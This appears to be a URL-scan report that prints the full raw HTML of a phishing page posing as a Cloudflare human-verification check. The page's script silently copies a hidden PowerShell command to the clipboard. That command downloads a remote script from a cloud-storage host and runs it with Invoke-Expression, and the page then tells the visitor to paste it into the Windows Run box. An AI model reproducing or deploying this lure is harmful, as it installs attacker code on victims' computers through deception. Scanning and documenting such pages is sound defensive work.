- 扫描 ID:
- e690a4bd-dd09-42fe-ae25-19a0fdcd1574已完成
- 提交的 URL:
- https://sos-ch-dk-2.exo.io/filebyte/cloudflare-new-desk-v3.html
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 3 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
error | network |
|
HTML
页面的原始 HTML 正文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Check</title>
<style>
body, html { margin: 0; padding: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; font-family: Arial, sans-serif; transition: background-color 0.3s, color 0.3s; }
body { background-color: #f9f9f9; color: #333; }
.captcha-container, .popup { background: #fff; border: 1px solid #d1d1d1; color: #333; }
@media (prefers-color-scheme: dark) {
body { background: #1c1c1e; color: #e5e5e7; }
.captcha-container, .popup { background: #2c2c2e; border-color: #3a3a3c; color: #e5e5e7; }
}
.dimmable-container { position: relative; z-index: 10; transition: opacity 0.3s; }
.dimmed { opacity: 0.2; }
.captcha-container {
text-align: center; max-width: 400px; padding: 40px; border-radius: 8px;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.15); display: flex; flex-direction: column; align-items: center;
}
.captcha-title { font-size: 20px; font-weight: bold; margin-bottom: 10px; }
.captcha-subtitle { font-size: 14px; margin-bottom: 25px; }
.captcha-checkbox {
display: flex; align-items: center; border: 1px solid #3a3a3c; padding: 15px; border-radius: 5px;
width: 100%; max-width: 280px; justify-content: space-between; cursor: pointer;
}
.captcha-checkbox input[type="checkbox"] { width: 20px; height: 20px; margin-right: 10px; transform: scale(1.3); }
.captcha-checkbox img { max-width: 80px; height: auto; }
.captcha-footer { font-size: 12px; color: #999; margin-top: 30px; }
.overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.6); z-index: 5; }
.popup {
display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); padding: 20px;
border-radius: 8px; width: 300px; text-align: center; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3); z-index: 100;
}
</style>
</head>
<body>
<div class="overlay" id="overlay"></div>
<div class="dimmable-container" id="dimmableContainer">
<div class="captcha-container">
<h1 class="captcha-title">Verify you are human</h1>
<p class="captcha-subtitle">Verify you are human by completing the action below.</p>
<label class="captcha-checkbox">
<input type="checkbox" id="captchaCheckbox">
<span>Verify you are human</span>
<img src="https://www.cloudflare.com/img/logo-cloudflare-dark.svg" alt="Cloudflare">
</label>
<div class="captcha-footer">Performance & security by Cloudflare</div>
</div>
</div>
<div class="popup" id="popup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "⊞" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
<script>
document.getElementById('captchaCheckbox').addEventListener('click', () => {
const cExe = "cmd.exe";
const cArgs = "/c powershell -WindowStyle Hidden -Command ";
const uVar = "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/desk.txt';";
const nCli = "$pLs=New-Object System.Net.WebClient;";
const gTxt = "$sLf=$pLs.DownloadString($rQd);";
const exCmd = "Invoke-Expression $sLf;";
const fullCommand = `${cExe} ${cArgs}"${uVar} ${nCli} ${gTxt} ${exCmd}"`;
navigator.clipboard.writeText(fullCommand).then(() => {
document.getElementById('overlay').style.display = 'block';
document.getElementById('popup').style.display = 'block';
document.getElementById('dimmableContainer').classList.add('dimmed');
});
});
</script>
</body></html>